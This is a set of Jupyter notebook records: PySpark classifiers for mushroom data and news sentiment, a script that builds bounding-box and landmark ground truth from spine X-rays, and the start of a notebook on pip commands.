"labelIndexer = StringIndexer().setInputCol(\"class\").setOutputCol(\"label\").fit(df)\n#cap_shapeIndexer = StringIndexer().setInputCol(\"cap-shape\").setOutputCol(\"cap_shapeNUM\").fit(df)\n#cap_surfaceIndexer = StringIndexer().setInputCol(\"cap-surface\").setOutputCol(\"cap_surfaceNUM\").fit(df)\n#cap_colorIndexer = StringIndexer().setInputCol(\"cap-color\").setOutputCol(\"cap_colorNUM\").fit(df)\n#bruisesIndexer = StringIndexer().setInputCol(\"bruises\").setOutputCol(\"bruisesNUM\").fit(df)\nodorIndexer = StringIndexer().setInputCol(\"odor\").setOutputCol(\"odorNUM\").fit(df)\n#gill_attachmentIndexer = StringIndexer().setInputCol(\"gill-attachment\").setOutputCol(\"gill_attachmentNUM\").fit(df)\n#gill_spacingIndexer = StringIndexer().setInputCol(\"gill-spacing\").setOutputCol(\"gill_spacingNUM\").fit(df)\ngill_sizeIndexer = StringIndexer().setInputCol(\"gill-size\").setOutputCol(\"gill_sizeNUM\").fit(df)\ngill_colorIndexer = StringIndexer().setInputCol(\"gill-color\").setOutputCol(\"gill_colorNUM\").fit(df)\n#stalk_shapeIndexer = StringIndexer().setInputCol(\"stalk-shape\").setOutputCol(\"stalk_shapeNUM\").fit(df)\nstalk_rootIndexer = StringIndexer().setInputCol(\"stalk-root\").setOutputCol(\"stalk_rootNUM\").fit(df)\n#stalk_surface_above_ringIndexer = StringIndexer().setInputCol(\"stalk-surface-above-ring\").setOutputCol(\"stalk_surface_above_ringNUM\").fit(df)\n#stalk_surface_below_ringIndexer = StringIndexer().setInputCol(\"stalk-surface-below-ring\").setOutputCol(\"stalk_surface_below_ringNUM\").fit(df)\n#stalk_color_above_ringIndexer = StringIndexer().setInputCol(\"stalk-color-above-ring\").setOutputCol(\"stalk_color_above_ringNUM\").fit(df)\n#stalk_color_below_ringIndexer = StringIndexer().setInputCol(\"stalk-color-below-ring\").setOutputCol(\"stalk_color_below_ringNUM\").fit(df)\n#veil_typeIndexer = StringIndexer().setInputCol(\"veil-type\").setOutputCol(\"veil_typeNUM\").fit(df)\n#veil_colorIndexer = StringIndexer().setInputCol(\"veil-color\").setOutputCol(\"veil_colorNUM\").fit(df)\n#ring_numberIndexer = StringIndexer().setInputCol(\"ring-number\").setOutputCol(\"ring_numberNUM\").fit(df)\nring_typeIndexer = StringIndexer().setInputCol(\"ring-type\").setOutputCol(\"ring_typeNUM\").fit(df)\nspore_print_colorIndexer = StringIndexer().setInputCol(\"spore-print-color\").setOutputCol(\"spore_print_colorNUM\").fit(df)\npopulationIndexer = StringIndexer().setInputCol(\"population\").setOutputCol(\"populationNUM\").fit(df)\n#habitatIndexer = StringIndexer().setInputCol(\"habitat\").setOutputCol(\"habitatNUM\").fit(df)",
"_____no_output_____"
]
],
[
[
"Augrund den Erkenntnissen aus dem Notebook Dataunderstanding wird der Feature Vektor auf 7 Merkmale reduziert",
"_____no_output_____"
]
],
[
[
"featureCols = df.columns.copy()\nfeatureCols.remove(\"class\")\nfeatureCols.remove(\"cap-shape\")\nfeatureCols.remove(\"cap-surface\")\nfeatureCols.remove(\"cap-color\")\nfeatureCols.remove(\"odor\")\nfeatureCols.remove(\"bruises\")\nfeatureCols.remove(\"gill-attachment\")\nfeatureCols.remove(\"gill-spacing\")\nfeatureCols.remove(\"gill-size\")\nfeatureCols.remove(\"gill-color\")\nfeatureCols.remove(\"stalk-shape\")\nfeatureCols.remove(\"stalk-root\")\nfeatureCols.remove(\"stalk-surface-above-ring\")\nfeatureCols.remove(\"stalk-surface-below-ring\")\nfeatureCols.remove(\"stalk-color-above-ring\")\nfeatureCols.remove(\"stalk-color-below-ring\")\nfeatureCols.remove(\"veil-type\")\nfeatureCols.remove(\"veil-color\")\nfeatureCols.remove(\"ring-number\")\nfeatureCols.remove(\"ring-type\")\nfeatureCols.remove(\"spore-print-color\")\nfeatureCols.remove(\"population\")\nfeatureCols.remove(\"habitat\")\n\n#featureCols = featureCols + [\"cap_shapeNUM\",\"cap_surfaceNUM\", \"cap_colorNUM\", \"bruisesNUM\", \"odorNUM\", \"gill_attachmentNUM\", \"gill_spacingNUM\", \"gill_sizeNUM\", \"gill_colorNUM\", \"stalk_shapeNUM\", \"stalk_rootNUM\", \"stalk_surface_above_ringNUM\", \"stalk_surface_below_ringNUM\", \"stalk_color_above_ringNUM\", \"stalk_color_below_ringNUM\", \"veil_colorNUM\", \"ring_numberNUM\", \"ring_typeNUM\", \"spore_print_colorNUM\", \"populationNUM\", \"habitatNUM\"]\nfeatureCols = featureCols + [\"odorNUM\",\"gill_sizeNUM\", \"gill_colorNUM\", \"stalk_rootNUM\", \"ring_typeNUM\", \"spore_print_colorNUM\", \"populationNUM\"]\n\nprint(featureCols)",
"['odorNUM', 'gill_sizeNUM', 'gill_colorNUM', 'stalk_rootNUM', 'ring_typeNUM', 'spore_print_colorNUM', 'populationNUM']\n"
],
[
"labeledData = labelIndexer.transform(df)\n\n#labeledDataNUM = cap_shapeIndexer.transform(cap_surfaceIndexer.transform(cap_colorIndexer.transform(bruisesIndexer.transform(odorIndexer.transform(gill_attachmentIndexer.transform(gill_spacingIndexer.transform(gill_sizeIndexer.transform(gill_colorIndexer.transform(stalk_shapeIndexer.transform(stalk_rootIndexer.transform(stalk_surface_above_ringIndexer.transform(stalk_surface_below_ringIndexer.transform(stalk_color_above_ringIndexer.transform(stalk_color_below_ringIndexer.transform(veil_colorIndexer.transform(veil_typeIndexer.transform(ring_numberIndexer.transform(ring_typeIndexer.transform(spore_print_colorIndexer.transform(populationIndexer.transform(habitatIndexer.transform(labeledData))))))))))))))))))))))\nlabeledDataNUM = odorIndexer.transform(gill_sizeIndexer.transform(gill_colorIndexer.transform(stalk_rootIndexer.transform(ring_typeIndexer.transform(spore_print_colorIndexer.transform(populationIndexer.transform(labeledData)))))))\nassembler = VectorAssembler(outputCol=\"features\", inputCols=featureCols)",
"_____no_output_____"
],
[
"splits = labeledDataNUM.randomSplit([0.9, 0.1 ], 12345)\ntraining = splits[0]\ntest = splits[1]",
"_____no_output_____"
]
],
[
[
"# SVM Klassifizierung mit Crossvalidation",
"_____no_output_____"
]
],
[
[
"evaluator = BinaryClassificationEvaluator(labelCol=\"label\",rawPredictionCol=\"prediction\", metricName=\"areaUnderROC\")",
"_____no_output_____"
],
[
"lsvc = LinearSVC(labelCol=\"label\",aggregationDepth=2, featuresCol=\"features\") ",
"_____no_output_____"
],
[
"pipeline = Pipeline(stages= [assembler, lsvc])",
"_____no_output_____"
],
[
"paramGrid = ParamGridBuilder().addGrid(lsvc.maxIter, [100])\\\n .addGrid(lsvc.regParam, [0.1, 0.001, 0.0001])\\\n .addGrid(lsvc.standardization, [True, False])\\\n .build()",
"_____no_output_____"
],
[
"cvSVM = CrossValidator(estimator=pipeline, evaluator=evaluator, estimatorParamMaps=paramGrid, numFolds=5, parallelism=2)",
"_____no_output_____"
],
[
"cvSVMModel = cvSVM.fit(training)",
"_____no_output_____"
]
],
[
[
"## Ausgabe der Crossvalidation Ergebnisse ",
"_____no_output_____"
]
],
[
[
"linearSVMModel = cvSVMModel.bestModel.stages[1]\nprint(\"Best Params: \\n\", linearSVMModel.explainParams())\nprint(\"Param Map: \\n\", linearSVMModel.extractParamMap())",
"Best Params: \n aggregationDepth: suggested depth for treeAggregate (>= 2). (default: 2, current: 2)\nfeaturesCol: features column name. (default: features, current: features)\nfitIntercept: whether to fit an intercept term. (default: True)\nlabelCol: label column name. (default: label, current: label)\nmaxIter: max number of iterations (>= 0). (default: 100, current: 100)\npredictionCol: prediction column name. (default: prediction)\nrawPredictionCol: raw prediction (a.k.a. confidence) column name. (default: rawPrediction)\nregParam: regularization parameter (>= 0). (default: 0.0, current: 0.001)\nstandardization: whether to standardize the training features before fitting the model. (default: True, current: True)\nthreshold: The threshold in binary classification applied to the linear model prediction. This threshold can be any real number, where Inf will make all predictions 0.0 and -Inf will make all predictions 1.0. (default: 0.0)\ntol: the convergence tolerance for iterative algorithms (>= 0). (default: 1e-06)\nweightCol: weight column name. If this is not set or empty, we treat all instance weights as 1.0. (undefined)\nParam Map: \n {Param(parent='LinearSVC_955a52b8396d', name='aggregationDepth', doc='suggested depth for treeAggregate (>= 2).'): 2, Param(parent='LinearSVC_955a52b8396d', name='featuresCol', doc='features column name.'): 'features', Param(parent='LinearSVC_955a52b8396d', name='fitIntercept', doc='whether to fit an intercept term.'): True, Param(parent='LinearSVC_955a52b8396d', name='labelCol', doc='label column name.'): 'label', Param(parent='LinearSVC_955a52b8396d', name='maxIter', doc='max number of iterations (>= 0).'): 100, Param(parent='LinearSVC_955a52b8396d', name='predictionCol', doc='prediction column name.'): 'prediction', Param(parent='LinearSVC_955a52b8396d', name='rawPredictionCol', doc='raw prediction (a.k.a. confidence) column name.'): 'rawPrediction', Param(parent='LinearSVC_955a52b8396d', name='regParam', doc='regularization parameter (>= 0).'): 0.001, Param(parent='LinearSVC_955a52b8396d', name='standardization', doc='whether to standardize the training features before fitting the model.'): True, Param(parent='LinearSVC_955a52b8396d', name='threshold', doc='The threshold in binary classification applied to the linear model prediction. This threshold can be any real number, where Inf will make all predictions 0.0 and -Inf will make all predictions 1.0.'): 0.0, Param(parent='LinearSVC_955a52b8396d', name='tol', doc='the convergence tolerance for iterative algorithms (>= 0).'): 1e-06}\n"
],
[
"predictions = cvSVMModel.transform(test)",
"_____no_output_____"
]
],
[
[
"# Test Error und Confusion Matrix ausgeben",
"_____no_output_____"
]
],
[
[
"accuracy = evaluator.evaluate(predictions)\nprint(\"Test Error\", (1.0 - accuracy))",
"Test Error 0.0741130393763344\n"
],
[
"predictionAndLabels = predictions.select(\"prediction\", \"label\").rdd.map(lambda p: [p[0], float(p[1])])\nmetrics = MulticlassMetrics(predictionAndLabels)",
"_____no_output_____"
],
[
"confusion = metrics.confusionMatrix()\nprint(\"Confusion matrix: \\n\" , confusion)",
"Confusion matrix: \n DenseMatrix([[373., 19.],\n [ 41., 370.]])\n"
],
[
"spark.stop()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
e707d3c962da08eda45196276b834dc2c4958d57 | 4,676 | ipynb | Jupyter Notebook | Chapter_7/Section_7.4.1.2.ipynb | godfanmiao/ML-Kaggle-Github-2023 | 89e82bb5c22764461f5d8e855fced556a5f7750c | [
"BSD-3-Clause"
] | 5 | 2021-11-04T02:01:10.000Z | 2021-12-26T03:13:43.000Z | Chapter_7/.ipynb_checkpoints/Section_7.4.1.2-checkpoint.ipynb | godfanmiao/ML-Kaggle-Github-2023 | 89e82bb5c22764461f5d8e855fced556a5f7750c | [
"BSD-3-Clause"
] | null | null | null | Chapter_7/.ipynb_checkpoints/Section_7.4.1.2-checkpoint.ipynb | godfanmiao/ML-Kaggle-Github-2023 | 89e82bb5c22764461f5d8e855fced556a5f7750c | [
"BSD-3-Clause"
] | 1 | 2022-01-01T03:33:18.000Z | 2022-01-01T03:33:18.000Z | 29.408805 | 153 | 0.474979 | [
[
[
"##################################################################\n#《Python机器学习及实践:从零开始通往Kaggle竞赛之路(2023年度版)》开源代码\n#-----------------------------------------------------------------\n# @章节号:7.4.1.2(分布式朴素贝叶斯分类模型) \n# @作者:范淼 \n# @电子邮箱:[email protected] \n# @微博:https://weibo.com/fanmiaothu \n# @官方交流QQ群号:561500762 \n##################################################################",
"_____no_output_____"
],
[
"from pyspark.sql import SparkSession\nimport pyspark.sql.functions as func\n\n\n#创建SparkSession。\nspark = SparkSession.builder.getOrCreate()\n\n#读取文件并存储到DataFrame中。\ndf = spark.read.csv('../Datasets/news/news_sentiment.csv', header=False)\n\n#指定标签列,并对文本特征列的数据进行分词处理。\ndf = df.select(df._c0.alias('label'), func.split(df._c1, ' ').alias('words'))\n\n#分割出训练和测试集。\n(train_df, test_df) = df.randomSplit([0.8, 0.2], seed=911120)",
"21/11/18 09:56:04 WARN NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable\nUsing Spark's default log4j profile: org/apache/spark/log4j-defaults.properties\nSetting default log level to \"WARN\".\nTo adjust logging level use sc.setLogLevel(newLevel). For SparkR, use setLogLevel(newLevel).\n \r"
],
[
"from pyspark.ml.feature import CountVectorizer, StringIndexer, StandardScaler\nfrom pyspark.ml.classification import NaiveBayes\nfrom pyspark.ml import Pipeline\n\n\n#对标签数据进行数字化编码。\nlabelIndexer = StringIndexer(inputCol=\"label\", outputCol=\"idx_label\")\n\n#对文本数据进行词频特征抽取。\ncv = CountVectorizer(inputCol=\"words\", outputCol=\"features\", vocabSize=500)\n\n#使用朴素贝叶斯分类器。\nclassifier = NaiveBayes(labelCol=\"idx_label\", featuresCol=\"features\")\n\n#使用Pipeline,构建标签编码、特征抽取,以及模型分类的执行流程。\npipeline = Pipeline(stages=[labelIndexer, cv, classifier])\n\nmodel = pipeline.fit(train_df)\n\npredictions = model.transform(test_df)",
" \r"
],
[
"from pyspark.ml.evaluation import MulticlassClassificationEvaluator\n\n\nevaluator = MulticlassClassificationEvaluator(labelCol=\"idx_label\", predictionCol=\"prediction\", metricName=\"accuracy\")\n\naccuracy = evaluator.evaluate(predictions)\n\n#评估分类器的准确率。\nprint ('Spark-ML的朴素贝叶斯分类器在news_sentiment测试集上的准确率为:%.2f%%。' %(accuracy * 100))",
"\r[Stage 9:> (0 + 1) / 1]\r"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code"
]
] |
e707dc1e59e1f99a5e7bab60f321b0ea494d942c | 18,904 | ipynb | Jupyter Notebook | Jupyter_Notebooks/generate_groundtruth.ipynb | Bidur-Khanal/SpineCurvEst | 6d4858b8ade5bfe6ebb21ce2d9faca249cb065f8 | [
"MIT"
] | 15 | 2019-10-21T13:52:32.000Z | 2021-10-01T13:59:01.000Z | Jupyter_Notebooks/generate_groundtruth.ipynb | wangcongbme/SpineCurvEst | 6d4858b8ade5bfe6ebb21ce2d9faca249cb065f8 | [
"MIT"
] | 3 | 2020-07-14T05:14:41.000Z | 2021-07-07T18:42:20.000Z | Jupyter_Notebooks/generate_groundtruth.ipynb | wangcongbme/SpineCurvEst | 6d4858b8ade5bfe6ebb21ce2d9faca249cb065f8 | [
"MIT"
] | 8 | 2019-10-21T13:52:41.000Z | 2021-12-10T03:30:07.000Z | 40.393162 | 472 | 0.559194 | [
[
[
"## Generate Dataset: ##\n\nGenerate bounding box groundtruth for object detection. An image consists of 17 vertebrae, each considered as different objects. Using the corner landmark-coordinates, bound each object with rectangular box. Every image will have 17 objects, each belonging to different class (17 classes in total), with 4 bounding box coordinates for each object. This script will output a csv file with column headers as: <br/>``` [ image_name, xmin, ymin, xmax, ymax, label ] ```",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport cv2\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport os",
"_____no_output_____"
],
[
"### visualize the bounding boxes\n\nfilename = \"sunhl-1th-10-Jan-2017-254 A AP.jpg\"\nimage_directory= \"C:/Users/Brinda Khanal/Downloads/scoliosis xray Single View/boostnet_labeldata/data/training/\"\nlabel_directory= \"C:/Users/Brinda Khanal/Downloads/scoliosis xray Single View/boostnet_labeldata/labels/training/\"\nimage = image_directory+filename\n\n\nimg = cv2.imread(image)\n\ndata= pd.read_csv(label_directory+\"landmarks.csv\",header= None)\nfilename_labels= pd.read_csv(label_directory+\"filenames.csv\",header= None)\n\nprint (\"image shape:\",img.shape)\nindx= filename_labels[filename_labels.iloc[:,0]== filename].index.tolist()\nlandmark= data.iloc[indx[0]].values\nfor m in range(0,68):\n cv2.circle(img,(int(img.shape[1]*landmark[m]),int(img.shape[0]*landmark[m+68])), 10, (255,255,255), -1)\n\nlandmark = [[int(round(img.shape[1]*landmark[m])),int(round(img.shape[0]*landmark[m+68]))] for m in range (0,68)]\n#print (landmark)\n\n\nN=4 \ncorners = [landmark[n:n+N] for n in range(0, len(landmark), N)]\ncorners= np.array(corners)\n\navg=[]\nfor box in corners:\n x,y,w,h = cv2.boundingRect(box) \n cv2.rectangle(img,(x-10,y-10),(x+w+10,y+h+10),(0,255,0),5)\n avg.append((w+10,h+10))\n print (x-10,y-10,w+10,h+10)\n \nprint (np.mean(avg,axis=0))\n\nplt.figure(1, figsize=(25,25))\n\n\nplt.subplot(211)\nplt.imshow(img[:,:,::-1])\n",
"_____no_output_____"
]
],
[
[
"### Save all the bounding boxes to visiualize",
"_____no_output_____"
]
],
[
[
"def visualize_all_bounding_box(image_directory, filenames_csv, landmarks_csv, save_path, split_type= 'train'):\n \n landmarks_data= pd.read_csv(landmarks_csv,header= None)\n filename_labels= pd.read_csv(filenames_csv,header= None)\n\n \n for i, names in enumerate(filename_labels.iloc[:,0]):\n\n img = cv2.imread(image_directory+names)\n print (image_directory+names)\n print (names)\n #print (\"image shape\",img.shape)\n landmarks = landmarks_data.loc[i].values\n landmarks = [[int(round(img.shape[1]*landmarks[m])),int(round(img.shape[0]*landmarks[m+68]))] for m in range (0,68)]\n \n # group landmark coordinates, each group has 4 points that represents a vertebra\n N=4 \n box = [landmarks[n:n+N] for n in range(0, len(landmarks), N)]\n #print (box)\n box= np.array(box)\n \n for c, box_coordinates in enumerate(box):\n x,y,w,h = cv2.boundingRect(box_coordinates) \n cv2.rectangle(img,(x-10,y-10),(x+w+10,y+h+10),(0,255,0),5)\n cv2.imwrite(save_path+split_type+'/'+names,img)\n ",
"_____no_output_____"
],
[
"ROOT_PATH = \"C:/Users/Brinda Khanal/Documents/Bidur Git Repo/Spine_Challenge/all landmark estimation/\"\ntrain_data_directory = os.path.join(ROOT_PATH, \"groundtruth for 68 landmarks detection/train/\")\n#val_data_directory = os.path.join(ROOT_PATH, \"data/val/\")\ntrain_label_directory=os.path.join(ROOT_PATH, \"groundtruth for 68 landmarks detection/\")\n#val_label_directory =os.path.join(ROOT_PATH, \"data/labels/val/\")\nsave_path=\"C:/Users/Brinda Khanal/Documents/Bidur Git Repo/Spine_Challenge/all landmark estimation/visualize boxes/\"\n\n### call make_csv function to create dataset in format supported by luminoth library\n\nvisualize_all_bounding_box(train_data_directory,os.path.join(train_label_directory,'train_filenames.csv'),\n os.path.join(train_label_directory,'predicted_train_landmarks.csv'),save_path, 'train')\n\n\n#visualize_all_bounding_box(val_data_directory,os.path.join(val_label_directory,'filenames.csv'),\n# os.path.join(val_label_directory,'landmarks.csv'),save_path, 'val')\n",
"_____no_output_____"
],
[
"def make_csv_bounding_box(image_directory, filenames_csv, landmarks_csv, split_type= 'train'):\n \n landmarks_data= pd.read_csv(landmarks_csv,header= None)\n filename_labels= pd.read_csv(filenames_csv,header= None)\n \n df= pd.DataFrame(columns=['image_id', 'xmin','ymin','xmax','ymax','label'])\n\n \n for i, names in enumerate(filename_labels.iloc[:,0]):\n\n img = cv2.imread(image_directory+names)\n print (names)\n #print (\"image shape\",img.shape)\n landmarks = landmarks_data.loc[i].values\n landmarks = [[int(round(img.shape[1]*landmarks[m])),int(round(img.shape[0]*landmarks[m+68]))] for m in range (0,68)]\n \n # group landmark coordinates, each group has 4 points that represents a vertebra\n N=4 \n box = [landmarks[n:n+N] for n in range(0, len(landmarks), N)]\n #print (box)\n box= np.array(box)\n \n for c, box_coordinates in enumerate(box):\n x,y,w,h = cv2.boundingRect(box_coordinates)\n if c < 12:\n df= df.append({'image_id': names, 'xmin': x-50, 'ymin': y-10, \n 'xmax': x+w+50,'ymax':y+h+10, 'label':1}, ignore_index=True) # increase the area of bounding rectangle if required\n else:\n df= df.append({'image_id': names, 'xmin': x-50, 'ymin': y-10, \n 'xmax': x+w+50,'ymax':y+h+10, 'label':2}, ignore_index=True) # increase the area of bounding rectangle if required\n \n csv_file= split_type + \".csv\"\n df.to_csv(csv_file,index= False)\n\n \n ",
"_____no_output_____"
],
[
"ROOT_PATH = \"C:/Users/Brinda Khanal/Documents/Bidur Git Repo/Spine_Challenge/Object detection/\"\ntrain_data_directory = os.path.join(ROOT_PATH, \"data/train/\")\nval_data_directory = os.path.join(ROOT_PATH, \"data/val/\")\ntrain_label_directory=os.path.join(ROOT_PATH, \"data/labels/train/\")\nval_label_directory =os.path.join(ROOT_PATH, \"data/labels/val/\")\n\n### call make_csv function to create dataset in format supported by luminoth library\n\nmake_csv_bounding_box(train_data_directory,os.path.join(train_label_directory,'filenames.csv'),\n os.path.join(train_label_directory,'landmarks.csv'), 'train')\n\n\nmake_csv_bounding_box(val_data_directory,os.path.join(val_label_directory,'filenames.csv'),\n os.path.join(val_label_directory,'landmarks.csv'), 'val')\n\n",
"_____no_output_____"
]
],
[
[
"## Generate GroundTruth for Landmark Prediction from Patch ##\n Using each vertebra bounding-box, generate patch-image (1 image will generate 17 patch-images). Find landmark-groundtruth-coordinates (between 0 and 1) for each patch.Save the groundtruth and patches.",
"_____no_output_____"
]
],
[
[
"def make_csv_landmark(image_directory, filenames_csv, landmarks_csv, split_type= 'train'):\n \n landmarks_data= pd.read_csv(landmarks_csv,header= None)\n filename_labels= pd.read_csv(filenames_csv,header= None)\n \n df= pd.DataFrame(columns=['image_id', 'x1','y1','x2','y2','x3','y3','x4','y4'])\n\n \n for i, names in enumerate(filename_labels.iloc[:,0]):\n\n img = cv2.imread(image_directory+names)\n \n landmarks = landmarks_data.loc[i].values\n landmarks = [[int(round(img.shape[1]*landmarks[m])),int(round(img.shape[0]*landmarks[m+68]))] for m in range (0,68)]\n \n # group landmark coordinates, each group has 4 points that represents a vertebra\n N=4 \n box = [landmarks[n:n+N] for n in range(0, len(landmarks), N)]\n #print (box)\n box= np.array(box)\n \n \n for c, box_coordinates in enumerate(box):\n print (box_coordinates)\n x_,y_,w_,h_ = cv2.boundingRect(box_coordinates)\n \n _increase_w = 50 #increase bounding box by certain pixels \n _increase_h = 10\n \n # if increasing bounding box result in region outside the image,donot perform increment\n if (x_-_increase_w) <0 :\n _increase_w=0\n if (y_-_increase_h) <0 :\n _increase_h=0\n \n \n patch_image = crop_patch (img, x_,y_,w_,h_, increase_w=_increase_w, increase_h=_increase_h)\n \n adjusted_landmarks = adjust_landmarks_position(patch_image, box_coordinates, increase_w= _increase_w,\n increase_h= _increase_h ,x=x_,y=y_,w=w_, h= h_)\n \n \n patch_name = names.replace('.jpg', '')+'_'+str(c)+'.jpg' # filename for each patch\n print (\"For Patch: \",patch_name)\n \n \n #resized_patch= cv2.resize(patch_image,(200,120),interpolation=cv2.INTER_AREA) #resize the patches to a fixed size\n \n \n # create a dictionary to append into dataframe row\n adjusted_landmarks_= adjusted_landmarks.ravel()\n adjusted_landmarks_=np.append(adjusted_landmarks_,patch_name)\n keywords= ['x1','y1','x2','y2','x3','y3','x4','y4','image_id']\n adjusted_landmarks_dict= dict(zip(keywords,adjusted_landmarks_))\n \n \n print (adjusted_landmarks_dict)\n \n ''''# for visualization of landmark\n adjusted_landmarks[:,0]= adjusted_landmarks[:,0]*resized_patch.shape[1]\n adjusted_landmarks[:,1]= adjusted_landmarks[:,1]*resized_patch.shape[0]\n \n \n for points in adjusted_landmarks:\n cv2.circle(resized_patch,(int(points[0]),int(points[1])), 3, (255,255,255), -1)\n print (points)'''\n \n save_path= split_type+'_patch_images/'+patch_name\n cv2.imwrite(save_path, patch_image)\n \n \n df= df.append(adjusted_landmarks_dict, ignore_index=True) \n \n \n csv_file= split_type+ '_patches_gnd'+ \".csv\"\n df.to_csv(csv_file,index= False)",
"_____no_output_____"
],
[
"def adjust_landmarks_position (patch_image, box_coordinates,x,y,w,h, increase_w =10, increase_h= 10):\n \n box_coordinates = box_coordinates.astype(float)\n\n \n # re-adjust the landmark coordinates in relation to single patch\n box_coordinates[:,0]= (box_coordinates[:,0]-(x-increase_w))/ patch_image.shape[1]\n box_coordinates[:,1]= (box_coordinates[:,1]-(y-increase_h))/ patch_image.shape[0]\n \n return box_coordinates\n \n ",
"_____no_output_____"
],
[
"def crop_patch(image, x,y,w,h, increase_w = 10, increase_h=10):\n img_copy= np.copy(image)\n patch_image = img_copy[y-increase_h:y+h+increase_h,x-increase_w:x+w+increase_w]\n return patch_image\n ",
"_____no_output_____"
]
],
[
[
"### Run this to generate patch images for train and validation, and a correponding csv file with landmark position (groundtruth)",
"_____no_output_____"
]
],
[
[
"ROOT_PATH = \"C:/Users/Brinda Khanal/Documents/Bidur Git Repo/Spine_Challenge/Object detection/\"\ntrain_data_directory = os.path.join(ROOT_PATH, \"data/train/\")\nval_data_directory = os.path.join(ROOT_PATH, \"data/val/\")\ntrain_label_directory=os.path.join(ROOT_PATH, \"data/labels/train/\")\nval_label_directory =os.path.join(ROOT_PATH, \"data/labels/val/\")\n\n\n\nmake_csv_landmark(train_data_directory,os.path.join(train_label_directory,'filenames.csv'),\n os.path.join(train_label_directory,'landmarks.csv'), 'train')\n\n\nmake_csv_landmark(val_data_directory,os.path.join(val_label_directory,'filenames.csv'),\n os.path.join(val_label_directory,'landmarks.csv'), 'val')",
"_____no_output_____"
]
],
[
[
"## Generate Ground Truth for Combined Landmarks detection ##",
"_____no_output_____"
]
],
[
[
"def generate_spine_image(image_directory, filenames_csv, landmarks_csv, save_path, split_type= 'train'):\n \n landmarks_data= pd.read_csv(landmarks_csv,header= None)\n filename_labels= pd.read_csv(filenames_csv,header= None)\n \n\n \n for i, names in enumerate(filename_labels.iloc[:,0]):\n\n img = cv2.imread(image_directory+names)\n print (names)\n #print (\"image shape\",img.shape)\n landmarks = landmarks_data.loc[i].values\n landmark = [[int(round(img.shape[1]*landmarks[m])),int(round(img.shape[0]*landmarks[m+68]))] for m in range (0,68)]\n\n # group 4 corner landmarks to form box\n N=4 \n landmark_corners = [landmark[n:n+N] for n in range(0, len(landmark), N)]\n landmark_corners= np.array(landmark_corners)\n boxes= []\n\n \n blank_image= np.zeros(img.shape,np.uint8)\n for box in landmark_corners:\n x,y,w,h = cv2.boundingRect(box)\n cv2.rectangle(blank_image,(x-50,y-50),(x+w+50,y+h+50),(255,255,255),-1)\n \n kernel = np.ones((10,10),np.uint8)\n dilated = cv2.dilate(blank_image,kernel,iterations = 5)\n \n \n masked_image = cv2.bitwise_and(img,dilated)\n masked = np.ma.array(data= img, mask= ~dilated.astype(bool))\n mean= np.mean(masked)\n print (mean)\n img[dilated==0]=mean\n cv2.imwrite(save_path+split_type+'/'+names,img)\n \n\n ",
"_____no_output_____"
],
[
"ROOT_PATH = \"C:/Users/Brinda Khanal/Documents/Bidur Git Repo/Spine_Challenge/Object detection/\"\ntrain_data_directory = os.path.join(ROOT_PATH, \"data/train/\")\nval_data_directory = os.path.join(ROOT_PATH, \"data/val/\")\ntrain_label_directory=os.path.join(ROOT_PATH, \"data/labels/train/\")\nval_label_directory =os.path.join(ROOT_PATH, \"data/labels/val/\")\nsave_path='C:/Users/Brinda Khanal/Documents/Bidur Git Repo/Spine_Challenge/all landmark estimation/groundtruth for 68 landmarks detection/' \n\n\n\ngenerate_spine_image(train_data_directory,os.path.join(train_label_directory,'filenames.csv'),\n os.path.join(train_label_directory,'landmarks.csv'), save_path,'train')\n\n\ngenerate_spine_image(val_data_directory,os.path.join(val_label_directory,'filenames.csv'),\n os.path.join(val_label_directory,'landmarks.csv'), save_path,'val')",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e707de9f3d5ba67ee15e1d19077639ec20165274 | 2,897 | ipynb | Jupyter Notebook | Week 1/Section 1/Pip and Python Package Index.ipynb | AjayMukundS/Takenmind-Internship | 98dcceb430b6a035db97e065686bc32df2513299 | [
"MIT"
] | null | null | null | Week 1/Section 1/Pip and Python Package Index.ipynb | AjayMukundS/Takenmind-Internship | 98dcceb430b6a035db97e065686bc32df2513299 | [
"MIT"
] | null | null | null | Week 1/Section 1/Pip and Python Package Index.ipynb | AjayMukundS/Takenmind-Internship | 98dcceb430b6a035db97e065686bc32df2513299 | [
"MIT"
] | null | null | null | 28.126214 | 180 | 0.537107 | [
[
[
"!pip install pandas",
"Requirement already satisfied: pandas in c:\\users\\ajaym\\appdata\\local\\programs\\python\\python38\\lib\\site-packages (1.1.4)\nRequirement already satisfied: numpy>=1.15.4 in c:\\users\\ajaym\\appdata\\local\\programs\\python\\python38\\lib\\site-packages (from pandas) (1.19.3)\nRequirement already satisfied: pytz>=2017.2 in c:\\users\\ajaym\\appdata\\local\\programs\\python\\python38\\lib\\site-packages (from pandas) (2020.1)\nRequirement already satisfied: python-dateutil>=2.7.3 in c:\\users\\ajaym\\appdata\\local\\programs\\python\\python38\\lib\\site-packages (from pandas) (2.8.1)\nRequirement already satisfied: six>=1.5 in c:\\users\\ajaym\\appdata\\local\\programs\\python\\python38\\lib\\site-packages (from python-dateutil>=2.7.3->pandas) (1.15.0)\n"
],
[
"!cd",
"C:\\Users\\ajaym\\Desktop\\Internship\\TakenMind Internship\n"
],
[
"!pip freeze > AllPackages2.txt",
"_____no_output_____"
],
[
"!dir",
